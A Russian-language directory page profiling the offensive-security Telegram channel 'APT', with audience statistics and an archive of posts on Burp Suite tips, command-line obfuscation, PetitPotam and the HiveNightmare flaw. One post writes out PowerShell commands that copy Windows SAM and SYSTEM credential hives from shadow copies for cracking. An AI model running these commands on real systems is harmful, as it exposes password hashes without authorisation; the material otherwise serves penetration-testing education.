APT

Открыть в Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Больше

Россия45 464 Технологии и приложения8 844...

📈 Аналитический обзор Telegram-канала APT

Канал APT (@apt_notes) языкового сегмента Английский является активным участником. Сейчас сообщество объединяет 14 712 подписчиков, занимая 8 844 место в категории Технологии и приложения и 45 464 место в регионе Россия.

📊 Показатели аудитории и динамика

С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 14 712 подписчиков.

Согласно последним данным от 14 июня, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 432, а за последние 24 часа — 26, при этом общий охват остаётся высоким.

Статус верификации: Не верифицирован
Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 51.64%. В первые 24 часа после публикации контент обычно набирает N/A% реакций от общего числа подписчиков.
Охват публикаций: В среднем каждый пост получает 7 592 просмотров. В течение первых суток публикация набирает 0 просмотров.
Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 20.

📝 Описание и контентная политика

Автор описывает ресурс как площадку для выражения субъективного мнения:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Благодаря высокой частоте обновлений (последние данные получены 15 июня, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.

14 712

Подписчики

+2624 часа

+1137 дней

+43230 день

7 592

Просмотры поста

Нет данных24 часа

Нет данных48 часов

51.64%

Коэффициент вовлеченности

Нет данных

Постов в день

Ads index

beta

Архив постов

14 715

1/n [JAVA] - Download API interfaces from Burp -> Extender -> APIs -> Save Interface files. - Create a package name burp and save files there, you can choose any IDE of your choice. - Make IDE ready to build JAR. - Create file name BurpExtender and add the following code.

14 715

#BurpHacksForBounties - Day 22/30 🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java. Thank you Burp Suite for making it easy #infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security

14 715

Windows Command-Line Obfuscation Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables. # https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation #cheatsheet #cmd #pentest

14 715

Cheat sheet when designing offensive code Source: https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg #redteam #sysmon

14 715

3/n Useful in : - Blind SQLi - SSRF - XSS - Detecting any out-of-bound source loads you can think of. - Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed Read more at: https://portswigger.net/burp/documentation/collaborator

14 715

2/n Image 1 - Start Collaborator client Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain. - Use that URL in the payload Image 3 - Poll to see the request made on the URL. Image 4 - Req payload In my case: DNS, HTTP requests were made.

14 715

1/n when injection occurs with a payload that triggers interaction to some other site, to verify such scenarios this Collaborator comes in handy. Works on client-server model. The public server hosted by PortSwigger. Self-hosting is possible too. How to use a client? 👇🏻

14 715

#BurpHacksForBounties - Day 21/30 ❤️ Burp Collaborator ❤️ 🙈 Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing. See what, how, and why👇🏻

14 715

#BurpHacksForBounties - Tip 20/30 Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity. https://sansorg.egnyte.com/dd/x19ByeTOpS/

14 715

WINDOWS LPE "HiveNightmare" or "SeriousSAM"

CVE-2021-36934

The problem is aggravated by the fact the 'shadow copy' of the system drive where these files can be found is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating. 1) Check permissions:

icacls.exe C:\Windows\System32\config\SAM

2) Check shadow copies, restore points

[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM')

... and so on 3) Copy SAM and SYSTEM files from shadow copy:

[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', 'C:\Temp\SAM')
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', 'C:\Temp\SYSTEM')

14 715

Plugin name: BurpBounty Scan Check Builder. It is fairly easy-to-use plugin. Install from BApp Store, create a check with simple name. Give it a severity, check enter the req/res you want to perform/check and enable it. ❤️

14 715

#BurpHacksForBounties - Tip 19/30 Adding your own scan rules to Burp Suite active/passive scanner. Include custom checks in scanner for #bugbounties without writing a single line of code. Using a plugin developed by @BurpBounty @egarme #infosec #appsec #burp #bugbountytips

14 715

🔥 HiveNightmare 🔥 Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin. This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves them in current directory as HIVENAME-haxx, for use with whatever cracking tools, or whatever, you want. https://github.com/GossiTheDog/HiveNightmare #redteam #pentest #vuln #nightmare

14 715

Burp Suite - ninja tricks https://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf #burp #tricks #BugBounty

14 715

1. Create a filter for intruder response. 2. Start the payload 3. If the response contains the string you entered in "grep" that will show up in an extra column. -> You can only focus on the response you are looking for.

14 715

#BurpHacksForBounties - Day 18/30 Do you want to filter the responses in Burp Suite Intruder? And only show the ones which have specific pattern present in response? If yes try this 👇🏻 🧵 #appsec #infosec #bugbountytips #bugbountytip #burp

14 715

PetitPotam PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function. https://github.com/topotam/PetitPotam #pentest #PetitPotam #rcp

14 715

Auditing Docker Security https://youtu.be/mQkVB6KMHCg #docker #autdit #security

14 715

Managing SSH Access at Scale with HashiCorp Vault Learn how to build scalable, role-based SSH access with SSH certificates and HashiCorp Vault. #vault

14 715

Let see this for blogspot.com, this is a reverse proxy setting that checks subdomains and routes them accordingly, now let's change the host for it. IMG 1 : Target = Host IMG 2 : Target != Host, but still the request is routed through the host.